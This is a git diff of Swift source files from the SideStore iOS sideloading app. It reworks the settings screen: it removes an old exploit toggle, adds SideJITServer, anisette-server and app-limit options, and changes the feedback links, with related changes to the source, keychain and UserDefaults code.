+        case anisetteServers
         case advancedSettings
+    
     }
 }
 
@@ -74,12 +82,14 @@ final class SettingsViewController: UITableViewController
     @IBOutlet private var accountTypeLabel: UILabel!
     
     @IBOutlet private var backgroundRefreshSwitch: UISwitch!
-    @IBOutlet private var enableCowExploitSwitch: UISwitch!
-
+    @IBOutlet private var noIdleTimeoutSwitch: UISwitch!
+    @IBOutlet private var disableAppLimitSwitch: UISwitch!
+    
+    @IBOutlet private var refreshSideJITServer: UILabel!
+    
     @IBOutlet private var versionLabel: UILabel!
     
-    override var preferredStatusBarStyle: UIStatusBarStyle
-    {
+    override var preferredStatusBarStyle: UIStatusBarStyle {
         return .lightContent
     }
     
@@ -88,6 +98,7 @@ final class SettingsViewController: UITableViewController
         super.init(coder: aDecoder)
         
         NotificationCenter.default.addObserver(self, selector: #selector(SettingsViewController.openPatreonSettings(_:)), name: AppDelegate.openPatreonSettingsDeepLinkNotification, object: nil)
+        NotificationCenter.default.addObserver(self, selector: #selector(SettingsViewController.openErrorLog(_:)), name: ToastView.openErrorLogNotification, object: nil)
     }
     
     override func viewDidLoad()
@@ -105,16 +116,36 @@ final class SettingsViewController: UITableViewController
         debugModeGestureRecognizer.numberOfTouchesRequired = 3
         self.tableView.addGestureRecognizer(debugModeGestureRecognizer)
         
+        var versionString: String = ""
         if let version = Bundle.main.object(forInfoDictionaryKey: "CFBundleShortVersionString") as? String
         {
-            self.versionLabel.text = NSLocalizedString(String(format: "SideStore %@", version), comment: "SideStore Version")
+            versionString += "SideStore \(version)"
+            if let xcode = Bundle.main.object(forInfoDictionaryKey: "DTXcode") as? String {
+                versionString += " - Xcode \(xcode) - "
+                if let build = Bundle.main.object(forInfoDictionaryKey: "DTXcodeBuild") as? String {
+                    versionString += "\(build)"
+                }
+            }
+            if let pairing = Bundle.main.object(forInfoDictionaryKey: "ALTPairingFile") as? String {
+                let pair_test = pairing == "<insert pairing file here>"
+                if !pair_test {
+                    versionString += " - \(!pair_test)"
+                }
+            }
         }
         else
         {
-            self.versionLabel.text = NSLocalizedString("SideStore", comment: "")
+            versionString += "SideStore\t"
         }
+        versionString += "\n\(Bundle.Info.appbundleIdentifier)"
+
+        self.versionLabel.text = NSLocalizedString(versionString, comment: "SideStore Version")
         
-        self.tableView.contentInset.bottom = 20
+        self.versionLabel.numberOfLines = 0
+        self.versionLabel.lineBreakMode = .byWordWrapping
+        self.versionLabel.setNeedsUpdateConstraints()
+        
+        self.tableView.contentInset.bottom = 40
         
         self.update()
         
@@ -131,6 +162,18 @@ final class SettingsViewController: UITableViewController
         
         self.update()
     }
+    
+    override func prepare(for segue: UIStoryboardSegue, sender: Any?) {
+        if segue.identifier == "anisetteServers" {
+            let controller = UIHostingController(rootView: AnisetteServers(selected: UserDefaults.standard.menuAnisetteURL, errorCallback: {
+                ToastView(text: "Cleared adi.pb!", detailText: "You will need to log back into Apple ID in SideStore.").show(in: self)
+            }))
+            self.show(controller, sender: nil)
+        } else {
+            super.prepare(for: segue, sender: sender)
+        }
+    }
+
 }
 
 private extension SettingsViewController
@@ -151,8 +194,9 @@ private extension SettingsViewController
         }
         
         self.backgroundRefreshSwitch.isOn = UserDefaults.standard.isBackgroundRefreshEnabled
-        self.enableCowExploitSwitch.isOn = UserDefaults.standard.enableCowExploit
-
+        self.noIdleTimeoutSwitch.isOn = UserDefaults.standard.isIdleTimeoutDisableEnabled
+        self.disableAppLimitSwitch.isOn = UserDefaults.standard.isAppLimitDisabled
+        
         if self.isViewLoaded
         {
             self.tableView.reloadData()
@@ -182,11 +226,11 @@ private extension SettingsViewController
         case .patreon:
             if isHeader
             {
-                settingsHeaderFooterView.primaryLabel.text = NSLocalizedString("PATREON", comment: "")
+                settingsHeaderFooterView.primaryLabel.text = NSLocalizedString("SUPPORT US", comment: "")
             }
             else
             {
-                settingsHeaderFooterView.secondaryLabel.text = NSLocalizedString("Support the SideStore Team by becoming a patron!", comment: "")
+                settingsHeaderFooterView.secondaryLabel.text = NSLocalizedString("Support the SideStore Team by following our socials or becoming a patron!", comment: "")
             }
 
         case .account:
@@ -203,21 +247,11 @@ private extension SettingsViewController
             }
             else
             {
-                settingsHeaderFooterView.secondaryLabel.text = NSLocalizedString("Enable Background Refresh to automatically refresh apps in the background when connected to Wi-Fi.", comment: "")
+                settingsHeaderFooterView.secondaryLabel.text = NSLocalizedString("Enable Background Refresh to automatically refresh apps in the background when connected to Wi-Fi. \n\nEnable Disable Idle Timeout to allow SideStore to keep your device awake during a refresh or install of any apps.", comment: "")
             }
             
         case .instructions:
             break
-        
-        case .cowExploit:
-            if isHeader
-            {
-                settingsHeaderFooterView.primaryLabel.text = NSLocalizedString("EXPLOITS", comment: "")
-            }
-            else
-            {
-                settingsHeaderFooterView.secondaryLabel.text = NSLocalizedString("Your device supports the M_D_C exploit. When this setting is on, the exploit is used to enable you to sideload more than 3 apps at a time. (warning: might be unstable)", comment: "")
-            }
             
         case .credits:
             settingsHeaderFooterView.primaryLabel.text = NSLocalizedString("CREDITS", comment: "")
@@ -238,28 +272,14 @@ private extension SettingsViewController
         let size = settingsHeaderFooterView.contentView.systemLayoutSizeFitting(UIView.layoutFittingCompressedSize)
         return size.height
     }
-    
-    func isSectionHidden(_ section: Section) -> Bool
-    {
-        switch section
-        {
-        case .cowExploit:
-            let isHidden = !(UserDefaults.standard.isCowExploitSupported)
-            return isHidden
-
-        default: return false
-        }
-    }
 }
 
 private extension SettingsViewController
 {
     func signIn()
     {
-        AppManager.shared.authenticate(presentingViewController: self)
-        { result in
-            DispatchQueue.main.async
-            {
+        AppManager.shared.authenticate(presentingViewController: self) { (result) in
+            DispatchQueue.main.async {
                 switch result
                 {
                 case .failure(OperationError.cancelled):
@@ -282,10 +302,8 @@ private extension SettingsViewController
     {
         func signOut()
         {
-            DatabaseManager.shared.signOut
-            { error in
-                DispatchQueue.main.async
-                {
+            DatabaseManager.shared.signOut { (error) in
+                DispatchQueue.main.async {
                     if let error = error
                     {
                         let toastView = ToastView(error: error)
@@ -300,24 +318,23 @@ private extension SettingsViewController
         let alertController = UIAlertController(title: NSLocalizedString("Are you sure you want to sign out?", comment: ""), message: NSLocalizedString("You will no longer be able to install or refresh apps once you sign out.", comment: ""), preferredStyle: .actionSheet)
         alertController.addAction(UIAlertAction(title: NSLocalizedString("Sign Out", comment: ""), style: .destructive) { _ in signOut() })
         alertController.addAction(.cancel)
-        // Fix crash on iPad
+        //Fix crash on iPad
         alertController.popoverPresentationController?.barButtonItem = sender
         self.present(alertController, animated: true, completion: nil)
     }
     
+    @IBAction func toggleDisableAppLimit(_ sender: UISwitch) {
+        UserDefaults.standard.isAppLimitDisabled = sender.isOn
+    }
+    
     @IBAction func toggleIsBackgroundRefreshEnabled(_ sender: UISwitch)
     {
         UserDefaults.standard.isBackgroundRefreshEnabled = sender.isOn
     }
     
-    @IBAction func toggleenableCowExploit(_ sender: UISwitch)
+    @IBAction func toggleNoIdleTimeoutEnabled(_ sender: UISwitch)
     {
-        UserDefaults.standard.enableCowExploit = sender.isOn
-
-        if UserDefaults.standard.activeAppsLimit != nil
-        {
-            UserDefaults.standard.activeAppsLimit = InstalledApp.freeAccountActiveAppsLimit
-        }
+        UserDefaults.standard.isIdleTimeoutDisableEnabled = sender.isOn
     }
     
     @available(iOS 14, *)
@@ -331,6 +348,39 @@ private extension SettingsViewController
         self.present(viewController, animated: true, completion: nil)
     }
     
+    func clearCache()
+    {
+        let alertController = UIAlertController(title: NSLocalizedString("Are you sure you want to clear SideStore's cache?", comment: ""),
+                                                message: NSLocalizedString("This will remove all temporary files as well as backups for uninstalled apps.", comment: ""),
+                                                preferredStyle: .actionSheet)
+        alertController.addAction(UIAlertAction(title: UIAlertAction.cancel.title, style: UIAlertAction.cancel.style) { [weak self] _ in
+            self?.tableView.indexPathForSelectedRow.map { self?.tableView.deselectRow(at: $0, animated: true) }
+        })
+        alertController.addAction(UIAlertAction(title: NSLocalizedString("Clear Cache", comment: ""), style: .destructive) { [weak self] _ in
+            AppManager.shared.clearAppCache { result in
+                DispatchQueue.main.async {
+                    self?.tableView.indexPathForSelectedRow.map { self?.tableView.deselectRow(at: $0, animated: true) }
+                    
+                    switch result
+                    {
+                    case .success: break
+                    case .failure(let error):
+                        let alertController = UIAlertController(title: NSLocalizedString("Unable to Clear Cache", comment: ""), message: error.localizedDescription, preferredStyle: .alert)
+                        alertController.addAction(.ok)
+                        self?.present(alertController, animated: true)
+                    }
+                }
+            }
+        })
+        
+        if let popoverController = alertController.popoverPresentationController {
+            popoverController.sourceView = self.view
+            popoverController.sourceRect = CGRect(x: self.view.bounds.midX, y: self.view.bounds.midY, width: 0, height: 0)
+        }
+        
+        self.present(alertController, animated: true)
+    }
+    
     @IBAction func handleDebugModeGesture(_ gestureRecognizer: UISwipeGestureRecognizer)
     {
         self.debugGestureCounter += 1
@@ -345,8 +395,7 @@ private extension SettingsViewController
         }
         else
         {
-            self.debugGestureTimer = Timer.scheduledTimer(withTimeInterval: 0.4, repeats: false)
-            { [weak self] _ in
+            self.debugGestureTimer = Timer.scheduledTimer(withTimeInterval: 0.4, repeats: false) { [weak self] (timer) in
                 self?.debugGestureCounter = 0
             }
         }
@@ -355,8 +404,7 @@ private extension SettingsViewController
     func openTwitter(username: String)
     {
         let twitterAppURL = URL(string: "twitter://user?screen_name=" + username)!
-        UIApplication.shared.open(twitterAppURL, options: [:])
-        { success in
+        UIApplication.shared.open(twitterAppURL, options: [:]) { (success) in
             if success
             {
                 if let selectedIndexPath = self.tableView.indexPathForSelectedRow
@@ -382,12 +430,20 @@ private extension SettingsViewController
     {
         guard self.presentedViewController == nil else { return }
                 
-        UIView.performWithoutAnimation
-        {
+        UIView.performWithoutAnimation {
             self.navigationController?.popViewController(animated: false)
             self.performSegue(withIdentifier: "showPatreon", sender: nil)
         }
     }
+
+    @objc func openErrorLog(_: Notification) {
+        guard self.presentedViewController == nil else { return }
+
+        self.navigationController?.popViewController(animated: false)
+        DispatchQueue.main.asyncAfter(deadline: .now() + 0.1) {
+            self.performSegue(withIdentifier: "showErrorLog", sender: nil)
+        }
+    }
 }
 
 extension SettingsViewController
@@ -409,7 +465,6 @@ extension SettingsViewController
         let section = Section.allCases[section]
         switch section
         {
-        case _ where self.isSectionHidden(section): return 0
         case .signIn: return (self.activeTeam == nil) ? 1 : 0
         case .account: return (self.activeTeam == nil) ? 0 : 3
         case .appRefresh: return AppRefreshRow.allCases.count
@@ -430,6 +485,17 @@ extension SettingsViewController
             cell.style = .single
         }
         
+        if AppRefreshRow.AllCases().count == 1
+        {
+            if let cell = cell as? InsetGroupTableViewCell,
+               indexPath.section == Section.appRefresh.rawValue,
+               indexPath.row == AppRefreshRow.backgroundRefresh.rawValue
+            {
+                cell.style = .single
+            }
+        }
+        
+        
         return cell
     }
     
@@ -438,10 +504,9 @@ extension SettingsViewController
         let section = Section.allCases[section]
         switch section
         {
-        case _ where self.isSectionHidden(section): return nil
         case .signIn where self.activeTeam != nil: return nil
         case .account where self.activeTeam == nil: return nil
-        case .signIn, .account, .patreon, .appRefresh, .credits, .cowExploit, .debug:
+        case .signIn, .account, .patreon, .appRefresh, .credits, .debug:
             let headerView = tableView.dequeueReusableHeaderFooterView(withIdentifier: "HeaderFooterView") as! SettingsHeaderFooterView
             self.prepare(headerView, for: section, isHeader: true)
             return headerView
@@ -455,9 +520,8 @@ extension SettingsViewController
         let section = Section.allCases[section]
         switch section
         {
-        case _ where self.isSectionHidden(section): return nil
         case .signIn where self.activeTeam != nil: return nil
-        case .signIn, .patreon, .appRefresh, .cowExploit:
+        case .signIn, .patreon, .appRefresh:
             let footerView = tableView.dequeueReusableHeaderFooterView(withIdentifier: "HeaderFooterView") as! SettingsHeaderFooterView
             self.prepare(footerView, for: section, isHeader: false)
             return footerView
@@ -471,10 +535,9 @@ extension SettingsViewController
         let section = Section.allCases[section]
         switch section
         {
-        case _ where self.isSectionHidden(section): return 1.0
         case .signIn where self.activeTeam != nil: return 1.0
         case .account where self.activeTeam == nil: return 1.0
-        case .signIn, .account, .patreon, .appRefresh, .credits, .debug, .cowExploit:
+        case .signIn, .account, .patreon, .appRefresh, .credits, .debug:
             let height = self.preferredHeight(for: self.prototypeHeaderFooterView, in: section, isHeader: true)
             return height
             
@@ -487,10 +550,9 @@ extension SettingsViewController
         let section = Section.allCases[section]
         switch section
         {
-        case _ where self.isSectionHidden(section): return 1.0
         case .signIn where self.activeTeam != nil: return 1.0
         case .account where self.activeTeam == nil: return 1.0
-        case .signIn, .patreon, .appRefresh, .cowExploit:
+        case .signIn, .patreon, .appRefresh:
             let height = self.preferredHeight(for: self.prototypeHeaderFooterView, in: section, isHeader: false)
             return height
             
@@ -513,11 +575,14 @@ extension SettingsViewController
             switch row
             {
             case .backgroundRefresh: break
+            case .noIdleTimeout: break
+            case .disableAppLimit: break
             case .addToSiri:
                 guard #available(iOS 14, *) else { return }
                 self.addRefreshAppsShortcut()
             }
             
+            
         case .credits:
             let row = CreditsRow.allCases[indexPath.row]
             switch row
@@ -533,68 +598,198 @@ extension SettingsViewController
             switch row
             {
             case .sendFeedback:
-                if MFMailComposeViewController.canSendMail()
-                {
-                    let mailViewController = MFMailComposeViewController()
-                    mailViewController.mailComposeDelegate = self
-                    mailViewController.setToRecipients(["support@sidestore.io"])
-                    
-                    if let version = Bundle.main.object(forInfoDictionaryKey: "CFBundleShortVersionString") as? String
-                    {
-                        mailViewController.setSubject("SideStore Beta \(version) Feedback")
+                let alertController = UIAlertController(title: "Send Feedback", message: "Choose a method to send feedback:", preferredStyle: .actionSheet)
+                
+                // Option 1: GitHub
+                alertController.addAction(UIAlertAction(title: "GitHub", style: .default) { _ in
+                    if let githubURL = URL(string: "https://github.com/SideStore/SideStore/issues") {
+                        let safariViewController = SFSafariViewController(url: githubURL)
+                        safariViewController.preferredControlTintColor = .altPrimary
+                        self.present(safariViewController, animated: true, completion: nil)
                     }
-                    else
-                    {
-                        mailViewController.setSubject("SideStore Beta Feedback")
+                })
+                
+                // Option 2: Discord
+                alertController.addAction(UIAlertAction(title: "Discord", style: .default) { _ in
+                    if let discordURL = URL(string: "https://discord.gg/sidestore-949183273383395328") {
+                        let safariViewController = SFSafariViewController(url: discordURL)
+                        safariViewController.preferredControlTintColor = .altPrimary
+                        self.present(safariViewController, animated: true, completion: nil)
+                    }
+                })
+                
+                // Option 3: Mail
+//                alertController.addAction(UIAlertAction(title: "Send Email", style: .default) { _ in
+//                    if MFMailComposeViewController.canSendMail() {
+//                        let mailViewController = MFMailComposeViewController()
+//                        mailViewController.mailComposeDelegate = self
+//                        mailViewController.setToRecipients(["support@sidestore.io"])
+//
+//                        if let version = Bundle.main.object(forInfoDictionaryKey: "CFBundleShortVersionString") as? String {
+//                            mailViewController.setSubject("SideStore Beta \(version) Feedback")
+//                        } else {
+//                            mailViewController.setSubject("SideStore Beta Feedback")
+//                        }
+//
+//                       self.present(mailViewController, animated: true, completion: nil)
+//                  } else {
+//                      let toastView = ToastView(text: NSLocalizedString("Cannot Send Mail", comment: ""), detailText: nil)
+//                      toastView.show(in: self)
+//                }
+//            })
+                
+                // Cancel action
+                alertController.addAction(UIAlertAction(title: "Cancel", style: .cancel, handler: nil))
+                
+                // For iPad: Set the source view if presenting on iPad to avoid crashes
+                if let popoverController = alertController.popoverPresentationController {
+                    popoverController.sourceView = self.view
+                    popoverController.sourceRect = self.view.bounds
+                }
+                
+                // Present the action sheet
+                self.present(alertController, animated: true, completion: nil)
+                
+            case .refreshSideJITServer:
+                if #available(iOS 17, *) {
+                
+                   let alertController = UIAlertController(
+                      title: NSLocalizedString("SideJITServer", comment: ""),
+                      message: NSLocalizedString("Settings for SideJITServer", comment: ""),
+                      preferredStyle: UIAlertController.Style.actionSheet)
+                    
+                    
+                    if UserDefaults.standard.sidejitenable {
+                        alertController.addAction(UIAlertAction(title: NSLocalizedString("Disable", comment: ""), style: .default){ _ in
+                            UserDefaults.standard.sidejitenable = false
+                        })
+                    } else {
+                        alertController.addAction(UIAlertAction(title: NSLocalizedString("Enable", comment: ""), style: .default){ _ in
+                            UserDefaults.standard.sidejitenable = true
+                        })
                     }
                     
-                    self.present(mailViewController, animated: true, completion: nil)
-                }
-                else
-                {
-                    let toastView = ToastView(text: NSLocalizedString("Cannot Send Mail", comment: ""), detailText: nil)
-                    toastView.show(in: self)
+                    alertController.addAction(UIAlertAction(title: NSLocalizedString("Server Address", comment: ""), style: .default){ _ in
+                        let alertController1 = UIAlertController(title: "SideJITServer Address", message: "Please Enter the SideJITServer Address Below. (this is not needed if SideJITServer has already been detected)", preferredStyle: .alert)
+                        
+
+                        alertController1.addTextField { textField in
+                            textField.placeholder = "SideJITServer Address"
+                        }
+                        
+                        
+                        let cancelAction = UIAlertAction(title: "Cancel", style: .cancel, handler: nil)
+                        alertController1.addAction(cancelAction)
+                        
+
+                        let okAction = UIAlertAction(title: "OK", style: .default) { _ in
+                            if let text = alertController1.textFields?.first?.text {
+                                UserDefaults.standard.textInputSideJITServerurl = text
+                            }
+                        }
+                        
+                        alertController1.addAction(okAction)
+                        
+                        // Present the alert controller
+                        self.present(alertController1, animated: true)
+                    })
+                    
+
+                   alertController.addAction(UIAlertAction(title: NSLocalizedString("Refresh", comment: ""), style: .destructive){ _ in
+                      if UserDefaults.standard.sidejitenable {
+                         var SJSURL = ""
+                          if (UserDefaults.standard.textInputSideJITServerurl ?? "").isEmpty {
+                            SJSURL = "http://sidejitserver._http._tcp.local:8080"
+                         } else {
+                            SJSURL = UserDefaults.standard.textInputSideJITServerurl ?? ""
+                         }
+                        
+                          
+                         let url = URL(string: SJSURL + "/re/")!
+
+                         let task = URLSession.shared.dataTask(with: url) { (data, response, error) in
+                            if let error = error {
+                               print("Error: \(error)")
+                            } else {
+                               // Do nothing with data or response
+                            }
+                         }
+
+                         task.resume()
+                      }
+                   })
+                    
+
+                   let cancelAction = UIAlertAction(title: "Cancel", style: .cancel, handler: nil)
+                   alertController.addAction(cancelAction)
+                   //Fix crash on iPad
+                   alertController.popoverPresentationController?.sourceView = self.tableView
+                   alertController.popoverPresentationController?.sourceRect = self.tableView.rectForRow(at: indexPath)
+                   self.present(alertController, animated: true)
+                   self.tableView.deselectRow(at: indexPath, animated: true)
+                } else {
+                   let alertController = UIAlertController(
+                      title: NSLocalizedString("You are not on iOS 17+ This will not work", comment: ""),
+                      message: NSLocalizedString("This is meant for 'SideJITServer' and it only works on iOS 17+ ", comment: ""),
+                      preferredStyle: UIAlertController.Style.actionSheet)
+
+                   alertController.addAction(.cancel)
+                   //Fix crash on iPad
+                   alertController.popoverPresentationController?.sourceView = self.tableView
+                   alertController.popoverPresentationController?.sourceRect = self.tableView.rectForRow(at: indexPath)
+                   self.present(alertController, animated: true)
+                   self.tableView.deselectRow(at: indexPath, animated: true)
                 }
+
+                
+            case .clearCache: self.clearCache()
+                
             case .resetPairingFile:
+                
                 let filename = "ALTPairingFile.mobiledevicepairing"
+                
                 let fm = FileManager.default
+                
                 let documentsPath = fm.documentsDirectory.appendingPathComponent("/\(filename)")
                 let alertController = UIAlertController(
                     title: NSLocalizedString("Are you sure to reset the pairing file?", comment: ""),
                     message: NSLocalizedString("You can reset the pairing file when you cannot sideload apps or enable JIT. You need to restart SideStore.", comment: ""),
                     preferredStyle: UIAlertController.Style.actionSheet)
                 
-                alertController.addAction(UIAlertAction(title: NSLocalizedString("Delete and Reset", comment: ""), style: .destructive)
-                { _ in
-                    if fm.fileExists(atPath: documentsPath.path), let contents = try? String(contentsOf: documentsPath), !contents.isEmpty
-                    {
+                alertController.addAction(UIAlertAction(title: NSLocalizedString("Delete and Reset", comment: ""), style: .destructive){ _ in
+                    if fm.fileExists(atPath: documentsPath.path), let contents = try? String(contentsOf: documentsPath), !contents.isEmpty {
+                        UserDefaults.standard.isPairingReset = true
                         try? fm.removeItem(atPath: documentsPath.path)
                         NSLog("Pairing File Reseted")
                     }
                     self.tableView.deselectRow(at: indexPath, animated: true)
-                    let dialogMessage = UIAlertController(title: NSLocalizedString("Pairing File Reseted", comment: ""), message: NSLocalizedString("Please restart SideStore", comment: ""), preferredStyle: .alert)
+                    let dialogMessage = UIAlertController(title: NSLocalizedString("Pairing File Reset", comment: ""), message: NSLocalizedString("Please restart SideStore", comment: ""), preferredStyle: .alert)
                     self.present(dialogMessage, animated: true, completion: nil)
                 })
                 alertController.addAction(.cancel)
-                // Fix crash on iPad
+                //Fix crash on iPad
                 alertController.popoverPresentationController?.sourceView = self.tableView
                 alertController.popoverPresentationController?.sourceRect = self.tableView.rectForRow(at: indexPath)
                 self.present(alertController, animated: true)
                 self.tableView.deselectRow(at: indexPath, animated: true)
+                
+            case .anisetteServers:
+                self.prepare(for: UIStoryboardSegue(identifier: "anisetteServers", source: self, destination: UIHostingController(rootView: AnisetteServers(selected: "", errorCallback: {
+                    ToastView(text: "Reset adi.pb", detailText: "Buh").show(in: self)
+                }))), sender: nil)
+//                self.performSegue(withIdentifier: "anisetteServers", sender: nil)
             case .advancedSettings:
                 // Create the URL that deep links to your app's custom settings.
-                if let url = URL(string: UIApplication.openSettingsURLString)
-                {
+                if let url = URL(string: UIApplication.openSettingsURLString) {
                     // Ask the system to open that URL.
                     UIApplication.shared.open(url)
-                }
-                else
-                {
+                } else {
                     ELOG("UIApplication.openSettingsURLString invalid")
                 }
             case .refreshAttempts, .errorLog: break
+
             }
-        case .cowExploit: break
+            
         default: break
         }
     }

AltStore/Sources/SourcesViewController.swift

@@ -12,17 +12,22 @@ import CoreData
 import AltStoreCore
 import Roxas
 
-struct SourceError: LocalizedError
+struct SourceError: ALTLocalizedError
 {
-    enum Code
+    enum Code: Int, ALTErrorCode
     {
+        typealias Error = SourceError
+
         case unsupported
     }
     
     var code: Code
+    var errorTitle: String?
+    var errorFailure: String?
+
     @Managed var source: Source
     
-    var errorDescription: String? {
+    var errorFailureReason: String {
         switch self.code
         {
         case .unsupported: return String(format: NSLocalizedString("The source “%@” is not supported by this version of SideStore.", comment: ""), self.$source.name)
@@ -197,7 +202,7 @@ private extension SourcesViewController
     {
         let alertController = UIAlertController(title: NSLocalizedString("Add Source", comment: ""), message: nil, preferredStyle: .alert)
         alertController.addTextField { (textField) in
-            textField.placeholder = "https://apps.altstore.io"
+            textField.placeholder = "https://apps.sidestore.io"
             textField.textContentType = .URL
         }
         alertController.addAction(.cancel)
@@ -545,19 +550,19 @@ extension SourcesViewController: UICollectionViewDelegateFlowLayout
                 footerView.textView.delegate = self
                 
                 let attributedText = NSMutableAttributedString(
-                    string: NSLocalizedString("SideStore has reviewed these sources to make sure they meet our safety standards.\n\nSupport for untrusted sources is currently in beta, but you can help test them out by", comment: ""),
+                    string: NSLocalizedString("SideStore has reviewed these sources to make sure they meet our safety standards.", comment: ""),
                     attributes: [.font: font, .foregroundColor: UIColor.gray]
                 )
-                attributedText.mutableString.append(" ")
+                //attributedText.mutableString.append(" ")
                 
-                let boldedFont = UIFont(descriptor: font.fontDescriptor.withSymbolicTraits(.traitBold)!, size: font.pointSize)
-                let openPatreonURL = URL(string: "https://SideStore.io/patreon")!
+                //let boldedFont = UIFont(descriptor: font.fontDescriptor.withSymbolicTraits(.traitBold)!, size: font.pointSize)
+                //let openPatreonURL = URL(string: "https://SideStore.io/")!
                 
-                let joinPatreonText = NSAttributedString(
-                    string: NSLocalizedString("joining our Patreon.", comment: ""),
-                    attributes: [.font: boldedFont, .link: openPatreonURL, .underlineColor: UIColor.clear]
-                )
-                attributedText.append(joinPatreonText)
+                // let joinPatreonText = NSAttributedString(
+                    // string: NSLocalizedString("", comment: ""),
+                    // attributes: [.font: boldedFont, .link: openPatreonURL, .underlineColor: UIColor.clear]
+                //)
+                //attributedText.append(joinPatreonText)
                 
                 footerView.textView.attributedText = attributedText
                 footerView.textView.textAlignment = .natural

AltStore/TabBarController.swift

@@ -33,6 +33,7 @@ final class TabBarController: UITabBarController
         NotificationCenter.default.addObserver(self, selector: #selector(TabBarController.openPatreonSettings(_:)), name: AppDelegate.openPatreonSettingsDeepLinkNotification, object: nil)
         NotificationCenter.default.addObserver(self, selector: #selector(TabBarController.importApp(_:)), name: AppDelegate.importAppDeepLinkNotification, object: nil)
         NotificationCenter.default.addObserver(self, selector: #selector(TabBarController.presentSources(_:)), name: AppDelegate.addSourceDeepLinkNotification, object: nil)
+        NotificationCenter.default.addObserver(self, selector: #selector(TabBarController.openErrorLog(_:)), name: ToastView.openErrorLogNotification, object: nil)
     }
     
     override func viewDidAppear(_ animated: Bool)
@@ -141,4 +142,7 @@ private extension TabBarController
     {
         self.selectedIndex = Tab.myApps.rawValue
     }
+    @objc func openErrorLog(_: Notification){
+        self.selectedIndex = Tab.settings.rawValue
+    }
 }

AltStore/Types/Managed.swift

@@ -10,23 +10,27 @@ import Foundation
 import CoreData
 
 @propertyWrapper @dynamicMemberLookup
-struct Managed<ManagedObject: NSManagedObject>
+struct Managed<ManagedObject>
 {
     var wrappedValue: ManagedObject {
         didSet {
-            self.managedObjectContext = self.wrappedValue.managedObjectContext
+            self.managedObjectContext = self.managedObject?.managedObjectContext
         }
     }
-    private var managedObjectContext: NSManagedObjectContext?
-    
+
     var projectedValue: Managed<ManagedObject> {
         return self
     }
     
+    private var managedObjectContext: NSManagedObjectContext?
+    private var managedObject: NSManagedObject? {
+        return self.wrappedValue as? NSManagedObject
+    }
+
     init(wrappedValue: ManagedObject)
     {
         self.wrappedValue = wrappedValue
-        self.managedObjectContext = wrappedValue.managedObjectContext
+        self.managedObjectContext = self.managedObject?.managedObjectContext
     }
     
     subscript<T>(dynamicMember keyPath: KeyPath<ManagedObject, T>) -> T
@@ -46,4 +50,18 @@ struct Managed<ManagedObject: NSManagedObject>
         
         return result
     }
+
+    // Optionals
+    subscript<Wrapped, T>(dynamicMember keyPath: KeyPath<Wrapped, T>) -> T? where ManagedObject == Optional<Wrapped> {
+        var result: T?
+
+        if let context = self.managedObjectContext {
+            context.performAndWait {
+                result = self.wrappedValue?[keyPath: keyPath] as? T
+            }
+        } else {
+            result = self.wrappedValue?[keyPath: keyPath] as? T
+        }
+        return result
+    }
 }

AltStoreCore/AltStoreCore.h

@@ -23,5 +23,6 @@ FOUNDATION_EXPORT const unsigned char AltStoreCoreVersionString[];
 // Shared
 #import <AltStoreCore/ALTConstants.h>
 #import <AltStoreCore/ALTConnection.h>
+#import <AltStoreCore/ALTWrappedError.h>
 #import <AltStoreCore/NSError+ALTServerError.h>
 #import <AltStoreCore/CFNotificationName+AltStore.h>

AltStoreCore/Components/Keychain.swift

@@ -77,6 +77,12 @@ public class Keychain
     @KeychainItem(key: "patreonAccountID")
     public var patreonAccountID: String?
     
+    @KeychainItem(key: "identifier")
+    public var identifier: String?
+    
+    @KeychainItem(key: "adiPb")
+    public var adiPb: String?
+    
     private init()
     {
     }

AltStoreCore/Extensions/OperatingSystemVersion+Comparable.swift

@@ -0,0 +1,18 @@
+//
+//  OperatingSystemVersion+Comparable.swift
+//  AltStoreCore
+//
+//  Created by nythepegasus on 5/9/24.
+//
+
+import Foundation
+
+extension OperatingSystemVersion: Comparable {
+    public static func ==(lhs: OperatingSystemVersion, rhs: OperatingSystemVersion) -> Bool {
+        return lhs.majorVersion == rhs.majorVersion && lhs.minorVersion == rhs.minorVersion && lhs.patchVersion == rhs.patchVersion
+    }
+    
+    public static func <(lhs: OperatingSystemVersion, rhs: OperatingSystemVersion) -> Bool {
+        return lhs.stringValue.compare(rhs.stringValue, options: .numeric) == .orderedAscending
+    }
+}

AltStoreCore/Extensions/String+SideStore.swift

@@ -0,0 +1,14 @@
+//
+//  String+SideStore.swift
+//  AltStoreCore
+//
+//  Created by nythepegasus on 5/9/24.
+//
+
+import Foundation
+
+public extension String {
+    init(formatted: String, comment: String? = nil, _ args: String...) {
+        self.init(format: NSLocalizedString(formatted, comment: comment ?? ""), args)
+    }
+}

AltStoreCore/Extensions/UserDefaults+AltStore.swift

@@ -10,7 +10,8 @@ import Foundation
 
 import Roxas
 
-public extension UserDefaults {
+public extension UserDefaults
+{
     static let shared: UserDefaults = {
         guard let appGroup = Bundle.main.appGroups.first else { return .standard }
         
@@ -21,11 +22,18 @@ public extension UserDefaults {
     @NSManaged var firstLaunch: Date?
     @NSManaged var requiresAppGroupMigration: Bool
     @NSManaged var textServer: Bool
+    @NSManaged var sidejitenable: Bool
+    @NSManaged var textInputSideJITServerurl: String?
     @NSManaged var textInputAnisetteURL: String?
     @NSManaged var customAnisetteURL: String?
+    @NSManaged var menuAnisetteURL: String
+    @NSManaged var menuAnisetteList: String
     @NSManaged var preferredServerID: String?
     
     @NSManaged var isBackgroundRefreshEnabled: Bool
+    @NSManaged var isIdleTimeoutDisableEnabled: Bool
+    @NSManaged var isAppLimitDisabled: Bool
+    @NSManaged var isPairingReset: Bool
     @NSManaged var isDebugModeEnabled: Bool
     @NSManaged var presentedLaunchReminderNotification: Bool
     
@@ -41,28 +49,27 @@ public extension UserDefaults {
     @NSManaged var patronsRefreshID: String?
     
     @NSManaged var trustedSourceIDs: [String]?
+    @NSManaged var trustedServerURL: String?
     
-    @nonobjc
     var activeAppsLimit: Int? {
         get {
             return self._activeAppsLimit?.intValue
         }
         set {
-            if let value = newValue {
+            if let value = newValue
+            {
                 self._activeAppsLimit = NSNumber(value: value)
             }
-            else {
+            else
+            {
                 self._activeAppsLimit = nil
             }
         }
     }
-
     @NSManaged @objc(activeAppsLimit) private var _activeAppsLimit: NSNumber?
-
-    @NSManaged var enableCowExploit: Bool
-    @NSManaged var isCowExploitSupported: Bool
-
-    class func registerDefaults() {
+    
+    class func registerDefaults()
+    {
         let ios13_5 = OperatingSystemVersion(majorVersion: 13, minorVersion: 5, patchVersion: 0)
